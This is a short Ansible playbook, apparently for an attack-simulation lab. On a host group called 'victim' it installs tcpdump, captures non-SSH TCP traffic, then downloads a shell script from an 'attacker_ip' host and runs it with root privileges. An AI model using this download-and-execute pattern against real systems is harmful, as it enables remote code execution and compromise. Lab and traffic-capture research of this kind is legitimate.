---
- hosts: victim
  become: yes
  vars:
    pcap_file: /home/captureB_tcp.pcap

  tasks:
    - name: Install tcpdump
      apt:
        name: 
           - tcpdump
        state: present
        update_cache: yes

    - name: Run tcpdump in background
      shell: tcpdump -i eth0 -w {{ pcap_file }} -U 'tcp and not port 22' &
      async: 300
      poll: 0
      register: tcpdump_result

    - name: Download script from attacker
      get_url:
        url: "http://{{ attacker_ip }}/script.sh"
        dest: "/tmp/script.sh"
        mode: '0755'

    - name: Execute script 
      shell: |
        chmod +x /tmp/script.sh
        /tmp/script.sh
      async: 120
      poll: 0



